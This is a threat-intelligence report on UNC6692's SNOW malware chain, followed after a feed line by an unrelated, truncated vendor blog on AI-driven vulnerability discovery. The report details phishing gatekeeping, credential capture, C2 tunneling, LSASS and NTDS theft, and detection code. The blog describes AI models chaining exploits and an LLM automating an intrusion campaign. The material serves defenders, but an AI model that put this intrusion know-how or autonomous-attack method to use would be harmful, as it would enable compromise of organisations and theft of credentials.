"description": "Microsoft Spam Filter Updates | Install the local patch to protect your account from email spamming",
Figure 1: Snippet from MS Team Logs
If the AutoHotkey binary is named the same as a script file in its current directory, AutoHotkey will automatically run the script with no additional command line arguments. Evidence of AutoHotKey execution was recorded immediately following the downloads resulting in initial reconnaissance commands and the installation of SNOWBELT, a malicious Chromium browser extension (not distributed through the Chrome Web Store). Mandiant was unable to recover the initial AutoHotKey script.
The persistence of SNOWBELT was established in multiple ways. First, a shortcut to an AutoHotKey script was added to the Windows Startup folder, which verified SNOWBELT was running and that a Scheduled Task was present.
if !CheckHeadlessEdge(){
    try{
        taskService:=ComObject("Schedule.Service")
        taskService.Connect()
        rootFolder:=taskService.GetFolder("\")
        if FindAndRunTask(rootFolder){
            Sleep 10000
            if CheckHeadlessEdge(){
                ExitApp
            }
        }
    }
    Run 'cmd /c start "" "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --user-data-dir="%LOCALAPPDATA%\Microsoft\Edge\System Data" --headless=new --load-extension="%LOCALAPPDATA%\Microsoft\Edge\Extension Data\SysEvents" --no-first-run',,"Hide"
}
ExitApp
Figure 2: Snippet from AutoHotKey script to verify SNOWBELT was running and to start it if not
Second, two additional scheduled tasks were installed: one to start a windowless Microsoft Edge process that loads the SNOWBELT extension, and another to identify and terminate Microsoft Edge processes that do not have CoreUIComponents.dll loaded.
Figure 3: Snippet from the scheduled task to start the SNOWBELT extension windowless Microsoft Edge
Microsoft Edge processes without CoreUIComponents.dll are typically headless. The threat actor uses this command to essentially “clean up” headless Edge processes that execute their malware.
Figure 4: Snippet from the scheduled task to check for CoreUIComponents.dll
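The launch pattern described above (a headless Edge process with an unpacked extension and a non-default profile directory, plus an AutoHotkey binary that shares its name with a script) can be hunted in process-creation and file-creation telemetry. The following is an added example, not code from the original report; the event field names, the severity tiers, and the sample records (including the `MailPatch` file names) are constructed assumptions.

```python
import ntpath
import re

CHROMIUM_BINARIES = {"msedge.exe", "chrome.exe"}
# Assumption: a --user-data-dir outside these default roots deserves a second look.
DEFAULT_PROFILE_SUFFIXES = ("\\microsoft\\edge\\user data",
                            "\\google\\chrome\\user data")
# Matches --flag, --flag=value and --flag="quoted value".
FLAG_RE = re.compile(r'--([A-Za-z0-9-]+)(?:=(?:"([^"]*)"|(\S+)))?')


def parse_flags(command_line):
    """Return {flag: value} for each Chromium switch, with quotes stripped."""
    return {name.lower(): quoted or bare
            for name, quoted, bare in FLAG_RE.findall(command_line)}


def assess_browser_launch(event):
    """Score one process-creation event; returns (severity, reasons)."""
    if ntpath.basename(event["image"]).lower() not in CHROMIUM_BINARIES:
        return "none", []
    flags = parse_flags(event["command_line"])
    reasons = []
    if "headless" in flags:
        reasons.append("headless")
    if "load-extension" in flags:
        reasons.append("unpacked-extension:" + flags["load-extension"])
    profile = flags.get("user-data-dir", "")
    if profile and not profile.lower().rstrip("\\").endswith(DEFAULT_PROFILE_SUFFIXES):
        reasons.append("nonstandard-profile:" + profile)
    # A windowless browser that side-loads an extension is the SNOWBELT pattern.
    if "headless" in flags and "load-extension" in flags:
        return "high", reasons
    if "load-extension" in flags:
        return "medium", reasons  # developers do this too, so review rather than block
    return ("low", reasons) if reasons else ("none", reasons)


def same_name_ahk_pairs(file_paths):
    """Find directories holding X.exe next to X.ahk, the AutoHotkey auto-run layout."""
    extensions = {}
    for path in file_paths:
        directory, name = ntpath.split(path)
        stem, ext = ntpath.splitext(name)
        extensions.setdefault((directory.lower(), stem.lower()), set()).add(ext.lower())
    return sorted(ntpath.join(directory, stem)
                  for (directory, stem), exts in extensions.items()
                  if {".exe", ".ahk"} <= exts and not stem.startswith("autohotkey"))


# Constructed sample telemetry (environment variables already expanded).
EDGE = r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
LOCAL = r"C:\Users\alice\AppData\Local\Microsoft\Edge"
SAMPLE_EVENTS = [
    {"image": EDGE, "command_line": '"' + EDGE + '" --profile-directory=Default'},
    {"image": EDGE, "command_line": '"' + EDGE + '" --headless=new '
        r"--print-to-pdf=C:\reports\out.pdf https://intranet.example/report"},
    {"image": EDGE, "command_line": '"' + EDGE + '" --user-data-dir="' + LOCAL +
        r'\System Data" --headless=new --load-extension="' + LOCAL +
        r'\Extension Data\SysEvents" --no-first-run'},
]
SAMPLE_FILES = [
    r"C:\Users\alice\Downloads\MailPatch.exe",
    r"C:\Users\alice\Downloads\MailPatch.ahk",
    r"C:\Users\alice\Downloads\notes.txt",
]

if __name__ == "__main__":
    for sample in SAMPLE_EVENTS:
        print(assess_browser_launch(sample))
    print(same_name_ahk_pairs(SAMPLE_FILES))
```

Headless browser automation on its own scores low here, so the rule separates routine PDF rendering or test runs from the combination the report describes.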
Using the SNOWBELT extension, UNC6692 downloaded additional files including SNOWGLAZE, SNOWBASIN, AutoHotkey scripts, and a ZIP archive containing a portable Python executable and required libraries.
Internal Recon and Lateral Movement
After gaining initial access, process execution telemetry recorded UNC6692 using a Python script to scan the local network for ports 135, 445, and 3389. Following internal port scanning, the threat actor established a Sysinternals PsExec session to the victim's system via the SNOWGLAZE tunnel, and executed commands to enumerate local administrator accounts. Using the local administrator account, the threat actor initiated an RDP session via the SNOWGLAZE tunnel from the victim system to a backup server. Though not directly observed, the threat actor may have acquired the local administrator account's credentials via multiple attack paths such as authenticated Server Message Block (SMB) share enumeration.
Escalate Privileges
After gaining access to the backup server, the threat actor utilized the local administrator account to extract the system's LSASS process memory with Windows Task Manager. The Microsoft Windows Local Security Authority Subsystem Service (LSASS) process, lsass.exe, enforces security policy and contains usernames, passwords and hashes for accounts that have accessed the system. After extracting the process memory, UNC6692 exfiltrated it via LimeWire. With the process memory out of the victim environment, UNC6692 is able to use offensive security tools to extract the credentials while not having to worry about being detected.
Complete Mission
Now armed with the password hashes of elevated users, UNC6692 used Pass-The-Hash to move laterally to the network's domain controllers. Pass-The-Hash is a common technique used by threat actors where the NTLM hash is passed to another system, instead of providing the account password, allowing for authentication via NTLM. Once authenticated to the Domain Controller, the threat actor opened Microsoft Edge, and downloaded a ZIP archive containing FTK Imager to the Domain Administrator’s \Downloads folder. The threat actor executed FTK Imager and mounted the local storage drive. Subsequently, FTK Imager wrote the Active Directory database file (NTDS.dit), Security Account Manager (SAM), SYSTEM, and SECURITY registry hives to the \Downloads folder. The extracted files were then exfiltrated from the network via LimeWire. Finally, EDR telemetry logged the threat actor performing screen captures on the Domain Controllers, specifically targeting in-focus instances of Microsoft Edge and FTK Imager.
Figure 5: UNC6692 attack lifecycle
THE SNOW Ecosystem
Phishing Landing Page
The original phishing link (https://service-page-25144-30466-outlook.s3.us-west-2.amazonaws.com/update.html?email=<redacted>.com) delivered via Microsoft Teams directs the victim to a landing page masquerading as a "Mailbox Repair Utility." This interface is designed to elicit user engagement through various on-screen buttons.
Figure 6: The landing page masquerading as an official "Mailbox Repair and Sync Utility v2.1.5."
Phase 1: Environment Enforcement and Anti-Analysis
The attacker used a gatekeeper script designed to ensure the payload is delivered only to intended targets while evading automated security sandboxes. Upon loading, the landing page executes an init() function that inspects the URL for a mandatory ?email= parameter. If this parameter is absent, the page immediately redirects to about:blank.
The script also checks the victim’s browser. If the user is not using Microsoft Edge, the page displays a persistent overlay warning. This forces the user to click an "Open in Edge" button, which triggers the microsoft-edge: URI scheme. This ensures the victim is moved from potentially secure mobile or third-party browser environments into a specific workspace where the attacker’s exploits are most effective.
Phase 2: Credential Harvesting via Social Engineering
Once the environment is established, the page presents a professional-looking "Configuration Management Panel" masquerading as an official "Mailbox Repair and Sync Utility." The primary hook is a "Health Check" button that, when clicked, triggers an "Authentication Required" modal.
The harvesting script, handleAuthFormSubmit, employs a "double-entry" psychological trick. It is programmed to reject the first and second password attempt as incorrect. This serves two functions: it reinforces the user’s belief that the system is legitimate and performs real-time validation, and it ensures that the attacker captures the password twice, significantly reducing the risk of a typo in the stolen data. A screenshot of authentication is shown in Figure 7, and the email supplied is entered by default.
Figure 7: The credential harvesting prompt triggered by the "Health Check" button
Phase 3: Data Exfiltration and Distraction Sequences
Upon successful submission, the script executes an asynchronous PUT request using AWS URLs. The validated credentials and metadata are uploaded directly to an attacker-controlled Amazon S3 bucket (e.g., service-page-18968-2419-outlook.s3.us-west-2.amazonaws.com), which has since been taken down. These buckets serve as the command and control (C2) infrastructure and represent critical indicators of compromise (IOCs).
To mask this background activity and prevent user suspicion, the script initiates a startProgressBar function. This displays a scripted distraction sequence featuring fake technical tasks such as "Parsing configuration data" and "Checking mailbox integrity." This manipulation keeps the victim engaged until the data transfer is complete.
Figure 8: A scripted distraction sequence used to mask the background exfiltration of stolen data
Phase 4: Malware Staging and Endpoint Foothold
The final stage involves the delivery of secondary malicious payloads referenced within the CONFIG object of the script. While the progress bar runs, the site is prepared to deliver files seen in Table 1.
| Button Clicked | File Downloaded | Type / Risk |
| --- | --- | --- |
| Profile 1.3 | Protected.ahk | AutoHotKey Script: Not found during the investigation, but suspected to install SNOWBELT. |
| Profile B5 | profileB5.txt | Likely a configuration file for the malware. |
| Component Verification | RegSrvc.exe | AutoHotKey Executable: Masquerading as a "Registration Service." |
| Health Check | N/A | Prompts the user to input email credentials. Exfiltrates the credentials to Amazon S3 bucket. |
Table 1: Buttons on the landing page
By the time the user receives a "Configuration completed successfully" message, the attacker has secured the credentials and potentially established a persistent foothold on the endpoint using these staged files.
The SNOW malware ecosystem, attributed to the threat cluster UNC6692, operates as a modular ecosystem comprising three primary components: SNOWBELT, SNOWGLAZE, and SNOWBASIN. Rather than functioning as isolated tools, these components form a coordinated pipeline that facilitates an attacker's journey from initial browser-based access to the internal network of the organization.
Figure 9: The SNOW ecosystem
1. SNOWBELT (Browser Extension)
SNOWBELT serves as the initial foothold and the primary "eyes" of the operation. It is a JavaScript-based backdoor delivered as a Chromium browser extension, often masquerading under names like "MS Heartbeat" or "System Heartbeat". Rather than being available through the Chrome Web Store, the extension is deployed through social engineering tactics.
Role: It is designed to intercept commands and send them to SNOWBASIN for execution. It maintains persistence via the browser's extension registration system and uses Service Worker Alarms and Keep-Alive Tab Injection (via helper.html) to ensure it remains active whenever the browser is running.
Functionality: By relaying commands from the threat actor to SNOWBASIN, SNOWBELT provides authenticated access to the environment. This allows the attacker to move laterally and escalate privileges without the need for constant re-authentication.
2. SNOWGLAZE (Python Tunneler)
Once a foothold is established, SNOWGLAZE is deployed to manage the logistics of external communication. SNOWGLAZE is a Python-based tunneler that can operate in both Windows and Linux environments.
Role: Its primary function is to create a secure, authenticated WebSocket tunnel between the victim's internal network and the attacker's command-and-control (C2) infrastructure, such as a Heroku subdomain. It facilitates SOCKS proxy operations, allowing arbitrary TCP traffic to be routed through the infected host.
Functionality: SNOWGLAZE masks malicious traffic by wrapping data in JSON objects and Base64 encoding it for transfer via WebSockets. This makes the activity appear as standard encrypted web traffic. When attackers wish to interact with backdoors like SNOWBASIN or exfiltrate staged data, traffic is routed through this established tunnel.
3. SNOWBASIN (Python Bindshell)
While SNOWBELT monitors the user and SNOWGLAZE bridges the network gap, SNOWBASIN provides the functional interactive control over the infected system.
Role: It acts as a persistent backdoor that operates as a local HTTP server (typically listening on port 8000). It enables remote command execution via cmd.exe or powershell.exe, screenshot capture, and data staging for exfiltration.
Functionality: This component is where active reconnaissance and mission completion occur. Attacker commands (such as whoami or net user) are sent through the SNOWGLAZE tunnel, intercepted by the SNOWBELT extension, and then proxied to the SNOWBASIN local server via HTTP POST requests. SNOWBASIN executes these commands and relays the results back through the same pipeline to the attacker.
Malware Analysis
SNOWBELT
SNOWBELT is a JavaScript-based backdoor implemented as a Chromium browser extension. Its lifecycle begins with the execution of the background.js Service Worker upon installation, which leverages the browser's extension registration system for persistence. To ensure continuous operation while the browser is active, the malware utilizes Service Worker Alarms (agent-heartbeat) and Keep-Alive Tab Injection (helper.html).
Upon initialization, the malware generates a unique identity using the prefix fp-sw- followed by a UUID. It then employs a time-based DGA to calculate C2 URLs. Using a hard-coded seed value (691f7258f212fa8908a8bf06bcf9e027d2177276e13e10ff56bd434ff3755cc4), it generates a registry URL for an S3 bucket within 30-minute time slots. These URLs follow a specific structural pattern:
This setup provides an asynchronous channel that allows attackers to "wake up" the Service Worker immediately via authenticated Push messages, bypassing standard polling. Additionally, the malware supports real-time interaction through a persistent REGISTRY_WEBSOCKET_URL connection.
SNOWBELT functions in coordination with SNOWBASIN, a backdoor acting as a local web server (typically on port 8000). It relays decrypted C2 commands—such as command, buffer, flush, and commit—to SNOWBASIN via HTTP POST requests, effectively proxying shell commands to the host system.
The malware also includes mechanisms to bypass the browser sandbox:
Native Host Bridge (open_native_messaging): Uses chrome.runtime.connectNative to establish I/O pipes with local applications for issuing privileged commands.
Protocol Handler Abuse (open_uri): Employs dream.html and dream.js to trigger custom URI schemes in new tabs, targeting vulnerabilities in third-party desktop applications.
Exfiltration is managed by the sendJsonDataToS3 function, which encrypts data with AES-GCM (Key: SHA256(SEED + "|ping|" + bucket + "|" + objectKey)) before uploading to S3. The backdoor's command set is summarized in Table 2.
| Command Type | Description |
| --- | --- |
| command | Relayed: Decrypts and POSTs command text to SNOWBASIN; exfiltrates response to C2. |
| buffer | Relayed: Forwards file path payloads to local buffer endpoint. |
| flush | Relayed: Triggers a data flush on the local server. |
| commit | Relayed: Sends URL and path data for local processing. |
| stop_server | Relayed: Shutdown signal for the local SNOWBASIN instance. |
| screenshot | Relayed: Requests a screen capture from the host. |
| payload | Internal: Downloads files using chrome.downloads; supports URLs and base64 blobs. |
| open_native_messaging | Internal: Direct connection to native host apps via Chrome APIs. |
| open_uri | Internal: Triggers external protocol handlers via helper pages. |
| delete_cache | Internal: Removes downloaded files from the system. |
| websocket_control | Internal: Controls the state of WebSocket connectivity. |
| ping | Internal: Provides heartbeats and status updates to the C2. |
Table 2: SNOWBELT commands
Finally, SNOWBELT implements a feedback loop by monitoring chrome.downloads.onChanged. If a download is blocked (e.g., FILE_VIRUS_INFECTED), the malware reports the error back to the S3-based C2.
SNOWBASIN
SNOWBASIN is a Python-based backdoor that operates as a local HTTP server on ports 8000, 8001, or 8002. Its core capabilities include command execution, screenshot capture, and data exfiltration. The malware also enables operators to manage files by downloading or deleting them, and it provides the capability to terminate active connections. SNOWBELT relays commands to this malware by sending HTTP requests to localhost:8000.
It turns the victim's computer into a command-and-control (C2) node that can be controlled via HTTP requests. It is designed to run on Windows (evidenced by os.chdir('C:\\') and cmd.exe calls) and allows a remote actor to execute commands, steal files, and take screenshots.
| Endpoint | Function | Description |
| --- | --- | --- |
| /stream | Remote Shell | Receives a command and executes it via cmd.exe or powershell.exe. It returns the STDOUT/STDERR results to the attacker. |
| /buffer | File Exfiltration | If a file path is provided, it reads the file, encodes it in Base64, and sends it back. If a folder is provided, it returns a full directory listing. |
| /flush | File Deletion | Relayed. Signals http://localhost[:]8000/flush to flush buffered data. |
| /commit | File Ingress | Downloads a file from a provided URL and saves it to a specific path on the local disk. It bypasses SSL certificate verification (CERT_NONE). |
| /capture | Take Screenshots | Uses the mss and PIL libraries to take a screenshot of all monitors and send the image back as a Base64 string. |
| /gc | Self-Termination | Shuts down the server instance, effectively "killing" the backdoor's connection. |
Table 3: SNOWBASIN endpoints
SNOWGLAZE
The network tunneler SNOWGLAZE, developed in Python, facilitates the routing of arbitrary TCP traffic through a compromised system by establishing a WebSocket connection to a static C2 host using hard-coded credentials.
The script is designed for cross-platform execution on both Windows and Linux, utilizing environment-specific behaviors for each. In Windows environments, it runs as a foreground process manageable via standard keyboard interrupts (Ctrl-C). Conversely, on Linux, it operates as a background daemon and includes specific logic to handle SIGINT and SIGTERM signals for orderly shutdowns.
To establish communication, the malware targets the C2 server at wss://sad4w7h913-b4a57f9c36eb[.]herokuapp[.]com:443/ws, masquerading its traffic with a Microsoft Edge User-Agent string. If the initial connection fails, the script employs an incremental backoff strategy, starting at 5 seconds and increasing by 5-second intervals up to a 300-second maximum. Upon a successful WebSocket handshake, it transmits the following Auth payload:
Following authentication, the script sends a "register" type message with no payload, followed by an "agent_info" JSON record. Although the "info" field within this record is intended to carry the public IP address, it remains unpopulated due to improper implementation in the script.
Once fully connected, the malware listens for JSON-formatted commands. The supported "type" values include:
ping
Prompts the script to return a "type": "pong" JSON object.
agent_public_ip
Intended to report the host's public IP via an agent_info structure; however, the IP field is consistently blank in current versions.
socks_connect
Requests a new SOCKS proxy connection using a unique conn_id provided by the operator to track the session. The request format is as follows:
Execution triggers an asynchronous worker thread that manages the TCP-to-WebSocket data transfer, utilizing Base64 encoding and JSON encapsulation with the socks_data type.
socks_data
Facilitates bidirectional data exchange between the WebSocket and the TCP socket. Data is Base64-encoded within the data field of the following structure:
Terminates the specific proxy stream identified by the given conn_id.
disconnect
Severs all active proxy connections and terminates script execution.
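Where WebSocket payloads are visible to defenders (for example at a TLS-inspecting proxy, which is an assumption here), the message types listed above can be used to recognise SNOWGLAZE-style tunneling. The following is an added example, not code from the original report: it relies only on the "type", "conn_id" and "data" fields named in the text, the verdict thresholds are assumptions, and all sample frames are constructed.

```python
import base64
import binascii
import json
from collections import Counter

# Message types named in the analysis above.
PROTOCOL_TYPES = {"ping", "pong", "register", "agent_info", "agent_public_ip",
                  "socks_connect", "socks_data", "disconnect"}
CONTROL_TYPES = {"register", "agent_info", "socks_connect"}


def classify_frames(frames):
    """Summarise one WebSocket session given its text-frame payloads."""
    type_counts = Counter()
    bytes_by_conn = Counter()
    for raw in frames:
        try:
            message = json.loads(raw)
        except (TypeError, ValueError):
            continue  # not JSON, so not this protocol
        if not isinstance(message, dict):
            continue
        kind = message.get("type")
        if not isinstance(kind, str) or kind not in PROTOCOL_TYPES:
            continue
        if kind == "socks_data":
            try:
                payload = base64.b64decode(message.get("data"), validate=True)
            except (binascii.Error, ValueError, TypeError):
                continue  # malformed Base64: do not count it as tunnel data
            bytes_by_conn[str(message.get("conn_id"))] += len(payload)
        type_counts[kind] += 1

    seen = set(type_counts)
    if bytes_by_conn and seen & CONTROL_TYPES:
        verdict = "tunnel"    # registration or connect message plus proxied data
    elif len(seen) >= 3:
        verdict = "suspect"   # assumption: three distinct protocol types is unusual
    else:
        verdict = "clean"     # a lone ping/pong is common in ordinary web apps
    return {"verdict": verdict,
            "types": dict(type_counts),
            "bytes_by_conn": dict(bytes_by_conn)}


def _b64(data):
    return base64.b64encode(data).decode("ascii")


# Constructed sample sessions.
REQUEST, RESPONSE = b"constructed-request", b"constructed-response-bytes"
BENIGN_FRAMES = [
    json.dumps({"type": "ping"}),
    json.dumps({"type": "message", "text": "build finished"}),
    "plain text frame",
]
RECON_ONLY_FRAMES = [
    json.dumps({"type": "register"}),
    json.dumps({"type": "agent_info", "info": ""}),
    json.dumps({"type": "pong"}),
]
TUNNEL_FRAMES = RECON_ONLY_FRAMES + [
    json.dumps({"type": "socks_connect", "conn_id": "c1"}),
    json.dumps({"type": "socks_data", "conn_id": "c1", "data": _b64(REQUEST)}),
    json.dumps({"type": "socks_data", "conn_id": "c1", "data": _b64(RESPONSE)}),
    json.dumps({"type": "socks_data", "conn_id": "c1", "data": "%%%not-base64%%%"}),
]

if __name__ == "__main__":
    for name, frames in (("benign", BENIGN_FRAMES), ("recon", RECON_ONLY_FRAMES),
                         ("tunnel", TUNNEL_FRAMES)):
        print(name, classify_frames(frames))
```

The per-connection byte totals give responders a quick view of how much traffic each proxied stream carried.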
Outlook & Implications
The UNC6692 campaign demonstrates how modern attackers blend social engineering and technical evasion to gain a foothold into environments. A critical element of this strategy is the systematic abuse of legitimate cloud services for payload delivery and exfiltration, and for command-and-control (C2) infrastructure. By hosting malicious components on trusted cloud platforms, attackers can often bypass traditional network reputation filters and blend into the high volume of legitimate cloud traffic.
This "living off the cloud" strategy allows attackers to blend malicious operations into a high volume of encrypted, reputably sourced traffic, making detection based on domain reputation or IP blocking increasingly ineffective. Defenders must now look beyond process monitoring to gain clear visibility into browser activity and unauthorized cloud traffic. As threat actors continue to professionalize these modular, cross-platform methodologies, the ability to correlate disparate events across the browser, local Python environments, and cloud egress points will be critical for early detection.
Indicators of Compromise (IOCs)
To assist the wider community in hunting and identifying the activity outlined in this blog post, we have included IOCs in a free GTI Collection for registered users.
rule G_Backdoor_SNOWBASIN_1 {
    meta:
        author = "Google Threat Intelligence Group (GTIG)"
        platform = "Windows"
    strings:
        $path1 = "self.path == '/probe':"
        $path2 = "self.path == '/stream':"
        $path3 = "self.path == '/buffer':"
        $path4 = "self.path == '/flush':"
        $path5 = "self.path == '/commit':"
        $path6 = "self.path == '/capture':"
        $path7 = "self.path == '/gc':"
        $func1 = "self.handle_stream("
        $func2 = "self.handle_buffer("
        $func3 = "self.handle_flush("
        $func4 = "self.handle_commit("
        $s1 = "self.wfile.write(info_msg"
        $s2 = "selected_port), WebServerHandler) as httpd:"
        $s3 = "ThreadedTCPServer(socketserver.ThreadingMixIn"
        $s4 = "httpd.serve_forever()"
    condition:
        filesize<1MB and (
            (all of ($s*) and 6 of ($path*, $func*)) or
            (8 of ($path*, $func*)) or
            10 of them
        )
}
MITRE ATT&CK
Tactic
Techniques
Initial Access
T1566.002: Spearphishing Link
Execution
T1053: Scheduled Task/Job
T1053.005: Scheduled Task
T1059: Command and Scripting Interpreter
T1059.001: PowerShell
T1059.003: Windows Command Shell
T1059.006: Python
T1059.007: JavaScript
T1059.010: AutoHotKey & AutoIT
T1204.001: Malicious Link
T1204.002: Malicious File
T1559: Inter-Process Communication
T1569.002: Service Execution
Persistence
T1176.001: Browser Extensions
T1543: Create or Modify System Process
T1543.003: Windows Service
T1547.001: Registry Run Keys / Startup Folder
T1547.009: Shortcut Modification
Privilege Escalation
T1068: Exploitation for Privilege Escalation
Defense Evasion
T1027: Obfuscated Files or Information
T1027.010: Command Obfuscation
T1027.015: Compression
T1036.005: Match Legitimate Resource Name or Location
T1055: Process Injection
T1070.004: File Deletion
T1112: Modify Registry
T1134: Access Token Manipulation
T1134.001: Token Impersonation/Theft
T1140: Deobfuscate/Decode Files or Information
T1202: Indirect Command Execution
T1562.001: Disable or Modify Tools
T1564.001: Hidden Files and Directories
T1622: Debugger Evasion
Credential Access
T1003.001: LSASS Memory
T1003.002: Security Account Manager
T1003.003: NTDS
T1110.001: Password Guessing
T1110.003: Password Spraying
T1552.001: Credentials In Files
Discovery
T1007: System Service Discovery
T1012: Query Registry
T1016: System Network Configuration Discovery
T1018: Remote System Discovery
T1033: System Owner/User Discovery
T1046: Network Service Discovery
T1057: Process Discovery
T1082: System Information Discovery
T1083: File and Directory Discovery
T1087.001: Local Account
T1518: Software Discovery
Lateral Movement
T1021.001: Remote Desktop Protocol
T1021.002: SMB/Windows Admin Shares
Collection
T1005: Data from Local System
T1074: Data Staged
T1113: Screen Capture
T1560: Archive Collected Data
T1560.001: Archive via Utility
Exfiltration
T1020: Automated Exfiltration
T1567: Exfiltration Over Web Service
T1567.002: Exfiltration to Cloud Storage
Command and Control
T1071.001: Web Protocols
T1090: Proxy
T1105: Ingress Tool Transfer
T1572: Protocol Tunneling
Impact
T1489: Service Stop
Resource Development
T1608.002: Upload Tool
T1608.005: Link Target
Acknowledgements
This analysis would not have been possible without the assistance from several individuals within Mandiant Consulting, Google Threat Intelligence Group and FLARE who helped with analysis and reviewing this blog post. We also appreciate Amazon for their collaboration against this threat.
from Threat Intelligence https://ift.tt/FtY8qly
via IFTTT
Last week, Anthropic announced Project Glasswing, an AI model so effective at discovering software vulnerabilities that they took the extraordinary step of postponing its public release. Instead, the company has given access to Apple, Microsoft, Google, Amazon, and a coalition of others to find and patch bugs before adversaries can.
Mythos Preview, the model that led to Project Glasswing, found vulnerabilities across every major operating system and browser. Some of these bugs had survived decades of human audits, aggressive fuzzing, and open-source scrutiny. One had been sitting for 27 years in OpenBSD, generally considered to be one of the world’s most secure operating systems.
It's tempting to file this under "AI lab says their AI is too dangerous," the same playbook OpenAI ran with GPT-2.
Not so fast; there's a material difference this time.
Mythos didn't just find individual CVEs.
It chained four independent bugs into an exploit sequence that bypassed both the browser renderer and the OS sandboxing
It performed local privilege escalation in Linux through race conditions
It built a 20-gadget ROP chain targeting FreeBSD's NFS server, distributed across packets.
Claude Opus 4.6, Anthropic's previous frontier model, failed at autonomous exploit development almost entirely. Mythos hit a 72.4% success rate in the Firefox JS shell.
This isn't theoretical, nor some new three-to-five-year prediction. This is about to be a real-world engineering reality.
Why Project Glasswing Exposes the Real Cybersecurity Gap
Here's the number that should keep security leaders awake at night: fewer than 1% of the vulnerabilities found by Mythos were patched.
Let that sink in for a moment.
The most powerful vulnerability discovery engine ever built ran against the world's most critical software, and the ecosystem couldn't absorb the output.
Glasswing solved the finding problem.
Nobody solved the problem of fixing.
Why Defenders Can't Keep Up: Calendar Speed vs. Machine Speed
This is the structural issue the cybersecurity industry has been circling for years. AI just made it impossible to ignore.
Defenders operate on calendar speed. They:
Gather intelligence
Build a campaign
Simulate the threats
Mitigate
Repeat
That cycle takes about four days on a good day. Attackers, especially those now leveraging LLMs at every stage of their operation, are moving at machine speed.
For an up-to-the-minute take, David B. Cross, CISO at Atlassian, will be speaking at the Autonomous Validation Summit on May 12 about what this looks like from the inside, why periodic testing can't keep pace with adversaries that operate autonomously, and what defenders should be doing instead.
AI-Powered Attacks Are Already Autonomous
Earlier this year, a threat actor deployed a custom MCP server hosting an LLM as part of their attack chain against FortiGate appliances.
The AI handled everything:
Automated backdoor creation
Internal infrastructure mapping fed directly to the model
Autonomous vulnerability assessment, and
AI-prioritized execution of offensive tools for domain admin access.
The result? 2,516 organizations across 106 countries were compromised in parallel. The entire chain, from initial access through credential dumping to data exfiltration, was autonomous. The only human involvement was reviewing the results afterward.
The gap between attacker speed and defender speed isn't new.
What's new is that a small but worrisome gap just became a canyon.
Autonomous systems like AISLE discovered 13 out of 14 OpenSSL CVEs in recent coordinated releases, bugs that had survived years of human review.
XBOW became the top-ranked hacker on HackerOne in 2025, surpassing all human participants.
The median time from disclosure to weaponized exploit dropped from 771 days in 2018 to single-digit hours by 2024.
By 2025, the majority of exploits will be weaponized before being publicly disclosed.
Now add Mythos-class discovery to this picture.
You don't get a safer world automatically. You get a tsunami of legitimate findings that still require human verification, organizational process, business continuity considerations, and patch cycles that haven't fundamentally changed in a decade.
How to Build a Mythos-Ready Security Program
The instinct after Glasswing is to ask: "How do we find more bugs?"
That's actually the wrong question.
The right one is: "When thousands of exploitable vulnerabilities land on your desk tomorrow morning, can your program actually process them?"
For most organizations, the honest answer is no. And the reason isn't a lack of tools or talent; it's a structural dependency on periodic, human-initiated processes that were designed for a world where vulnerabilities trickled in, not one where they arrived in a tsunami.
We can't fix every vulnerability. We can't apply every hardening option.
That's not defeatism; that’s the pragmatic starting point for any security program that actually works. The question that matters isn't "is this CVE critical?" but "is this vulnerability exploitable in my environment, right now, given what I have deployed?"
First: Signal-Driven Validation Over Scheduled Testing
When a new threat emerges, when an asset changes, or when a configuration drifts, defenses need to be tested against that specific change in that moment. Not during the next quarterly pentest. Not when someone can find an open calendar slot.
The entire concept of "scheduled validation" assumes a stable threat landscape, and today, that assumption is dead on arrival.
Second: Environment-Specific Context Over Generic CVSS Scores
Glasswing will produce an avalanche of CVEs.
Yet most vulnerability management programs are still prioritized by CVSS scores. This context-free metric tells you how bad a bug could be in theory, not whether it's exploitable in your specific infrastructure, given your controls and business risk.
When the volume of findings suddenly goes from hundreds to thousands, context-free prioritization won't just slow you down; it’ll break your process entirely.
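The contrast between context-free and environment-specific prioritization, as an added example that is not from the original article or from any vendor's product. The field names, tier rules and sample findings are assumptions constructed for illustration; real inputs would come from your asset inventory and validation results.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Finding:
    cve: str                 # placeholder ID, constructed for this example
    cvss: float              # context-free base score
    asset: str
    deployed: bool           # vulnerable component is actually present
    reachable: bool          # an attacker has a network path to the asset
    control_blocks: bool     # a validation run showed an existing control stops it
    business_critical: bool

def tier(f):
    """Return (tier, reason); tier 0 is fixed first. Tier rules are hypothetical."""
    if not f.deployed:
        return 3, "component not deployed"
    if not f.reachable:
        return 2, "no network path"
    if f.control_blocks:
        return 2, "existing control validated"
    if f.business_critical:
        return 0, "exploitable on critical asset"
    return 1, "exploitable"

def by_cvss(findings):
    # What a CVSS-only queue looks like: highest theoretical severity first.
    return [f.cve for f in sorted(findings, key=lambda f: -f.cvss)]

def by_context(findings):
    # Environment tier decides the order; CVSS only breaks ties within a tier.
    return [f.cve for f in sorted(findings, key=lambda f: (tier(f)[0], -f.cvss))]

# Constructed sample data, not real CVEs or assets.
FINDINGS = [
    Finding("CVE-PLACEHOLDER-A", 9.8, "build-server", False, True, False, False),
    Finding("CVE-PLACEHOLDER-B", 9.1, "intranet-wiki", True, True, True, False),
    Finding("CVE-PLACEHOLDER-C", 7.5, "payments-api", True, True, False, True),
    Finding("CVE-PLACEHOLDER-D", 6.5, "vpn-gateway", True, True, False, False),
    Finding("CVE-PLACEHOLDER-E", 8.8, "db-replica", True, False, False, False),
]

if __name__ == "__main__":
    print("CVSS order:   ", by_cvss(FINDINGS))
    print("Context order:", by_context(FINDINGS))
    for f in FINDINGS:
        print(f.cve, f.asset, *tier(f))
```

In this sample the two findings with the lowest CVSS scores move to the top of the queue because they are the only ones exploitable as deployed, while the 9.8 drops to last because the component is not present.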
The current model can’t survive in a world where adversaries exploit CVEs within hours of disclosure. You know the drill:
Scanner finds a bug
Analyst triages it
The ticket goes to a different team
Someone patches it weeks later
Nobody re-validates
That chain of manual handoffs is exactly where the system disintegrates. If the cycle from finding to fix to re-validation can't run without humans shuttling tickets between queues, it clearly isn’t running anywhere near machine speed.
This isn't about buying more tools. It's about defenders leveraging their one asymmetric advantage: you know your organization’s topology, attackers don't.
That's a significant advantage, but only if you can act on it at machine speed.
How Autonomous Exposure Validation Closes the Gap — and Where Picus Comes in
This is the part where I’m going to be really transparent about who's writing this.
